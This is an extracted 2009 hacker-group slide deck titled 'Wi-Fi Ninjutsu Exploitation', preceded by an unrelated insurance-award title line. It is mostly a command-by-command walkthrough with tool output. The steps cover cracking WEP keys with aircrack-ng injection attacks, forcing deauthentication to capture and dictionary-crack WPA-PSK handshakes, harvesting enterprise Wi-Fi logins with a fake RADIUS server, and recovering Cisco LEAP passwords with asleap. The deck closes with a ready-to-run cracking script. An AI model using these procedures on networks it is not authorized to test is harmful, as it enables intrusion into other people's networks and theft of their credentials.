Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Ahmad Siddiq Wi-Fi Ninjutsu Exploitation
1. Special thanks to:
Milw0rm | str0ke paperwork released on 24/2/2009
AHMAD JabAv0C && ZeQ3uL from CWH Underground | cwh.citec.us / www.citec.us
2. Contents
Introduction
Conclusion steps for cracking WEP
Security of Wireless network
Owned the WPA-PSK / WPA2-PSK Key
Breaking the Simple Defenses
Exploiting Enterprise Wireless Connection (WPA-
Mac Filtering
TLS/TTLS/PEAP)
Discover Hidden SSID
Exploiting CISCO LEAP
Sniffing Information on the Air
Get closer with cracking tool Refrences & Greetz to
Aircrack-ng suite
About Me / Questions
Decrypt packet with airdecap-ng
Decloak packet with airdecloak-ng
Owned the WEP Key with Simple Technique (No
Injection)
Capturing method
Cracking method
Owned the WEP Key with Advanced Technique
(With Inject Method)
Monitor Mode
Fake Authentication
ARP Replay Attack
Fragmentation Attack
Korek ChopChop Attack
Packetforge
ARP Request Replay with Interactive Attack
Cracking WEP key
3. Introduction
This presentation will introduce to you guys
the practical techniques used by hackers to
break the wireless security.
You really need to have some basic
knowledge of wireless operation to
understand.
8. Breaking the Simple Defenses
Discover Hidden SSID
- SSID broadcasting can be disabled in beacon frames
ONLY
- All other management frames (probe/responses,
Hacker association and reassociations frames) contains the
SSID or the network.
So… what can I do is…..
- Forge DISASSOCIATE frames, to a station seaming to
come from the ACCESS POINT, so the station tries to
reassociate (and send the SSID)
- Reboot a client, so it reassociate when it initialize (if you
have physical access to equipments)
- RF jam (interferences) a client so it tries to reassociate (and
expose SSID)
- Install a fake Access Point near a client with weak signal so
it tries to roam (probe requests will be sent).
11. Get Closer with the Cracking Tool
Aircrack-ng suite
Aircrack-ng suite is a set of tools for auditing wireless
networks.
4 main tools for today:
Airodump-ng – Used for capturing packets
Aireplay-ng – Used for injection
De-authentication
Fake authentication
Interactive packet replay
ARP replay
KoreK Chopchop
Fragment
Packetforge-ng – Used for creating packets
Aircrack-ng – Used for recovering keys
12. Get Closer with the Cracking Tool
Decrypt packets with airdecap-ng
For WPA, airdecap-ng will return successful result
for only file which contains four ways handshake.
13. Get Closer with the Cracking Tool
Decloak packet with airdecloak-ng
Cloaking is a technique to disturb cracking WEP key process.
This technique is done by injecting packets which are encrypted
with random WEP key to the network, these packets are called
quot;chaffquot;. If the attacker capture these packet and do the cracking,
The result will be wrong or there is no result returned.
However, the aircrack team have developed the tool to deal with
this technique, it is called quot;airdecloak-ngquot;.
#airdecloak-ng --bssid xx:xx:xx:xx:xx:xx -i workshop-01.cap
This command return two files:
- workshop-01-filtered.cap: contain the filtered packets from specific
bssid
- workshop-01-cloaked.cap: contain the cloaked packets from specific
bssid
14. Get Closer with the Cracking Tool
Aircracking 101
PTW Attack
(-z) (aircrack-ng -z capture.cap), Only work for WEP 64/128 bits,
Require ARP request/replay packet that you must dump all
packet from airodump-ng
Dictionary Attack
(WPA/WPA2 passphrases) (aircrack-ng -w pass.lst *.cap)
Fudge Attack
(-f) Once hit 2 millions IVs, Try fudge factor to quot;-f 4quot;. Retry,
increasing the fudge factor by adding 4 to it each time.
All the while, keep collecting data. Remember the golden
rule, quot;The More IVs the Betterquot;
16. Owned the WEP Key with Simple
Technique (No Injection)
Lets assume that the network has a high-traffic so
we don’t need to do all those injection stuffs and
so on.
Preparation :
A device which supports monitor mode and can inject
packets to the network.
MY Preparation:
5 years old laptop – AMD Turion64 1.6GHz 256MB
DDR (still working harmoniously despite…)
Ubuntu Intrepid Ibex 8.10
Broadcomm chipset running legacy b43 driver.
18. Owned the WEP Key with Simple Technique (No Injection)
Cracking Method
#aircrack-ng –b xx:xx:xx:xx:xx:xx workshop-01.cap
-b xx:xx:xx:xx:xx:xx is the MAC address of target access point
The successful cracking result is following:
---------------------------------------------------------------
Opening workshop-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
19. Owned the WEP Key with
Advanced Technique (With Inject
Method)
Lets assume that the network has no traffic at all.
We can conclude about the requirements of chosen
packet for injection as following.
The MAC address is associated to access point. (we can
do this by fake authentication)
Send from client to access point. (the “To DS” flag is set to
1)
The destination MAC address is broadcasted.
(FF:FF:FF:FF:FF:FF)
The well-known packet which covers all requirements
is ARP request broadcast.
We can divide the situation for injection technique into
2 scenarios.
The network has ARP request.
The network has no ARP request.
20. Owned the WEP Key with Advanced Technique (With Inject Method)
Monitor mode
Using airmon-ng to set your wifi card to Monitor Mode
and prepare for packet injection.
#airmon-ng start wlan0 11
Setting wlan0 to Monitor mode on channel 11, We must
specify the same channel as the target AP channel.
Troops. Prepare for
assault!
Hacker Affirmative
I Choose YOU!
21. Owned the WEP Key with Advanced Technique (With Inject Method)
Fake Authentication
We can do fake authentication by the following command:
#aireplay-ng -1 0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
–a xx:xx:xx:xx:xx:xx is MAC address of access point
–h yy:yy:yy:yy:yy:yy is MAC address of our wireless card
If we get successful result, our MAC address will associate
with particular access point.
------------------------------------------
00:00:00 Sending Authentication Request
00:00:00 Authentication successful
00:00:00 Sending Association Request
00:00:00 Association successful :-)
------------------------------------------
After succeeding in fake authentication, we have to determine
what type of network we are faced with and pick the
appropriate steps to deal with it.
22. Owned the WEP Key with Advanced Technique (With Inject Method)
ARP Replay Attack
We can use ARP replay attack by following
command:
#aireplay-ng -3 -b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
–b xx:xx:xx:xx:xx:xx is MAC address of access point
–h yy:yy:yy:yy:yy:yy is MAC address of our wireless card
Aireplay-ng will detect ARP request and use it
to perform replay attack automatically.
------------------------------------------------------------------------------------
21:06:20 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
Saving ARP requests in replay_arp-0223-210620.cap
You should also start airodump-ng to capture replies.
Read 1379 packets (got 30 ARP requests and 0 ACKs), sent 3468 packets...(499 pps)
------------------------------------------------------------------------------------
23. Owned the WEP Key with Advanced Technique (With Inject Method)
Fragmentation Attack
Fragment attack is used to generate key
stream in a size of 1500 bytes. So, we can use
this key stream to create a packet which has
size up to 1500 bytes. The command for
fragment attack is:
#aireplay-ng -5 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
24. Owned the WEP Key with Advanced Technique (With Inject Method)
Fragmentation Attack
The system responds with this:
-------------------------------------------------------------------------------
21:21:07 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
21:21:07 Waiting for a data packet...
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 20df 0000 b168 ff00 2872 ../=.. ....h..(r
0x0020: 7547 d03f 70d7 2d29 1397 7d3d ac16 382a uG.?p.-)..}=..8*
0x0030: f20f 77fb ca63 13e0 f7a6 9228 ddc0 8263 ..w..c.....(...c
0x0040: 5315 a328 87cb 0d4a b36a e5be 93c7 307a S..(...J.j....0z
0x0050: 7bc2 18d7 2df5 94f2 5aed {...-...Z.
Use this packet ?
-------------------------------------------------------------------------------
25. Owned the WEP Key with Advanced Technique (With Inject Method)
Fragmentation Attack
We just have to answer yes
-----------------------
Use this packet ? y
-----------------------
And the successful process looks like this:
----------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-212107.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0223-212107.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
----------------------------------------------------------------------------------
26. Owned the WEP Key with Advanced Technique (With Inject Method)
Korek ChopChop Attack
We are able to use chopchop attack with this command:
#aireplay-ng -4 –b xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy rausb0
Aireplay-ng will pick a packet for decrypting. we can should any
packet which has BSSID like our target.
--------------------------------------------------------------------------------------
21:12:42 Waiting for beacon frame (BSSID: 00:1B:2F:3D:CB:D6) on channel 11
Size: 90, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = 00:1A:73:37:E2:A3
Source MAC = 00:1B:2F:3D:CB:D6
0x0000: 8842 2c00 001a 7337 e2a3 001b 2f3d cbd6 .B,...s7..../=..
0x0010: 001b 2f3d cbd6 6084 0000 55bc e600 2e4e ../=..`...U....N
0x0020: a334 a2b3 fc4c fe8a 2cf4 f548 0f27 90d0 .4...L..,..H.'..
0x0030: 767d 2725 bedd 62ec 252e 8b4b d2d3 a8a0 v}'%..b.%..K....
0x0040: bb3f 4874 c821 c402 467d f70f 2a56 43a7 .?Ht.!..F}..*VC.
0x0050: b09b f0f1 8b04 fc1c 0b72 .........r
Use this packet ?
----------------------------------------------------------------------------------------
27. Owned the WEP Key with Advanced Technique (With Inject Method)
Korek ChopChop Attack
Just answer yes
-----------------------
Use this packet ? y
-----------------------
And then the system will do the decrypting
---------------------------------------------------------------------------------------
Saving chosen packet in replay_src-0223-211242.cap
Offset 87 ( 3% done) | xor = 4E | pt = 3C | 64 frames written in 1097ms
Offset 86 ( 5% done) | xor = 16 | pt = 1D | 119 frames written in 2029ms
Offset 85 ( 7% done) | xor = 63 | pt = 7F | 146 frames written in 2476ms
Offset 84 ( 8% done) | xor = 97 | pt = 6B | 239 frames written in 4068ms
Offset 83 (10% done) | xor = 0E | pt = 0A | 228 frames written in 3865ms
Offset 82 (12% done) | xor = 86 | pt = 0D | 273 frames written in 4646ms
And so on ...
The AP appears to drop packets shorter than 40 bytes.
Enabling standard workaround: IP header re-creation.
Saving plaintext in replay_dec-0223-211410.cap
Saving keystream in replay_dec-0223-211410.xor
Completed in 21s (2.48 bytes/s)
---------------------------------------------------------------------------------------
28. Owned the WEP Key with Advanced Technique (With Inject Method)
Packetforge
To create encrypted packet form PRGA (XOR)
that obtained from the chopchop or fragment
attack.
#Packetforge-ng -0 –a xx:xx:xx:xx:xx:xx –h yy:yy:yy:yy:yy:yy –k 255.255.255.255 –l
255.255.255.255 –y replay_dec-0223-211410.xor –w arp
The result is:
----------------------
Wrote packet to: arp
----------------------
From this command, we get ARP request packet
in file named “arp”.
29. Owned the WEP Key with Advanced Technique (With Inject Method)
ARP Request Replay with Interactive
Attack
We use aireplay to inject arp request packet to access
point by following command:
#aireplay-ng -2 –r arp rausb0
And…
-----------------------------------------------------------------------------------
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1B:2F:3D:CB:D6
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:21:27:C0:07:71
0x0000: 0841 0201 001b 2f3d cbd6 0021 27c0 0771 .A..../=...!'..q
0x0010: ffff ffff ffff 8001 55bc e600 2e4e a334 ........U....N.4
0x0020: a2b3 fc4a bb8b 24c4 2618 4f26 fdf7 6c3b ...J..$.&.O&..l;
0x0030: ef7a 2a36 5dbb 252c 8c0c 8764 632d 537e .z*6].%,...dc-S~
0x0040: 66bf 700e f.p.
Use this packet ?
-----------------------------------------------------------------------------------
30. Owned the WEP Key with Advanced Technique (With Inject Method)
ARP Request Replay with Interactive
Attack
Yes is the only option available
-----------------------
Use this packet ? y
-----------------------
Now aireplay-ng starts injecting the packets
-------------------------------------------------------
Saving chosen packet in replay_src-0223-211755.cap
You should also start airodump-ng to capture replies.
Sent 1200 packets...(499 pps)
-------------------------------------------------------
And don’t forget to start airodump-ng
31. Owned the WEP Key with Advanced Technique (With Inject Method)
Cracking WEP Key
#aircrack-ng –z capture1.cap (PTW Attack)
The successful cracking result is following:
---------------------------------------------------------------
Opening capture1.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 50417 ivs.
KEY FOUND! [ 00:11:22:33:44 ]
Decrypted correctly: 100%
---------------------------------------------------------------
32. Conclusion Scripts for Cracking WEP
$AP is Access Point MAC Address
$WIFI is WIFI Card MAC Address
airmon-ng start wlan0 11 (Must specific channel of Monitor Mode)
airodump-ng -c 11 -w capture1.cap wlan0
aireplay-ng -1 0 -e linksys -a $AP -h $WIFI wlan0
aireplay-ng -4 -b $AP -h $WIFI wlan0
If Its Not Working!! Try #aireplay-ng -5 -b $AP -h $WIFI wlan0
packetforge-ng -0 -a $AP -h $WIFI -k 255.255.255.0 -l 255.255.255.0 -y replay.xor -w arp
aireplay-ng -2 -r arp wlan0
aircrack-ng -z capture1.cap
34. Owned the WPA-PSK/WPA2-PSK
Key
We are able to do this by de-authenticate
associated client.
This way will force the client to perform re-
authentication and we can get four ways
handshake from this process.
The command for de-authentication is:
#aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz rausb0
21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
35. Owned the WPA-PSK/WPA2-PSK
Key
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
Opening test-02.cap
Read 252 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)
Choosing first network as target.
Opening workshop-02.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1085
[00:00:00] 0 keys tested (0.00 k/s)
KEY FOUND! [ TheFuckinWPAKey ]
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4 E2 48 6C DF 59 8D 19
19 B5 F2 80 BE 81 15 10 63
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6 61 A7 42 D8 32 9B 48
37 01 80 0B A7 83 F9 67 B2 9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F
AA 86 2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
36. Exploiting Wireless Enterprise
(WPA-TLS/TTLS/PEAP)
Most companies turned to use public key encryption with
wireless network and they think that it is perfectly safe.
But the tricky hacker still attacks this system by spoofing
certificate.
This attacking method takes an advantage of client incaution.
Many clients accept certification without considering whether
it is genuine certificate or not.
This make attacker impersonate himself to be radius server
and login credential information from victims.
We can use freeradius as fake radius server combining with
WPE patch to enable login credential information on
freeradius server
additional information:
http://www.willhackforsushi.com/FreeRADIUS_WPE.html
37. Exploiting CISCO LEAP
Cisco proprietary Lightweight Extensible
Authentication Protocol (LEAP) wireless
authentication process helps eliminate security
vulnerabilities by supporting centralized, user-
based authentication and the ability to generate
dynamic WEP keys.
Cisco LEAP is one of the extensible
authentication protocol (EAP) types specified by
802.1X.
We found that the usernames that are sent to
Radius are plaintexts, that captured from
Wireshark but the password was encrypted.
So It's also vulnerable to exploit… (insert evil
38. Exploiting CISCO LEAP
asleap is a tool designed to recover weak
LEAP (Cisco's Lightweight Extensible
Authentication Protocol) and PPTP passwords.
asleap can perform:
Weak LEAP and PPTP password recovery from
pcap and AiroPeek files or from live capture
Deauthentication of clients on a leap WLAN
(speeding up leap password recovery) AIRJACK
DRIVER REQUIRED
Download Here: http://asleap.sourceforge.net/
39. Exploiting CISCO LEAP
First step, Use asleap to produce the
necessary database (.dat) and index files (.idx)
#./genkeys -r dictionary -f dict.dat -n dict.idx
dict = Our wordlist/dictionary file, with one word per line
dict.dat = Our new output pass+hash file (generated as a result of running this command)
dict.idx = Our new output index filename (generated as a result of running this command)
-----------------------------------------------------------------------
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
–----------------------------------------------------------------------
40. Exploiting CISCO LEAP
The final step in recovering our weak LEAP password is
to run the asleap command with our newly created .dat
and .idx files:
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or
AiroPeek capture file (.apc) can be used)
dict.dat = Our output pass+hash file (generated with genkeys, see above)
dict.idx = Our new output index filename (generated with genkeys, see above)
41. Exploiting CISCO LEAP
So… what are we waiting for?
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
-----------------------------------------------------------------------
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...
-----------------------------------------------------------------------
Now ASLEAP 2.2, which includes the “-C” and “-R” options to specify the
hex-delimited bytes for the challenge and the response (respectively).
Using this option, Asleap becomes a generic MS-CHAPv2 cracking tool,
and can be applied anytime you have a MS-CHAPv2 packet capture
available.
42. References & Greetz to
PaulDotCom Forum
http://www.darkoperator.com/scripts
http://trac.metasploit.com/wiki/Karmetasploit
http://aircrack-ng.org/doku.php
http://www.citec.us
http://www.milw0rm.com
Greetz to the CWH Underground team:
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter,
Conan, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
43. About Me / Questions
I’m Siddiq, 19.
Currently pursuing Degree in Biochemistry at
Technology Park Malaysia College.
A retarded lazy part-time web programmer @ I-
don’t-know-anything-about-IT
Currently looking for a real part-time job.
mysiddiq@gmail.com
Thanks for attending.
Questions?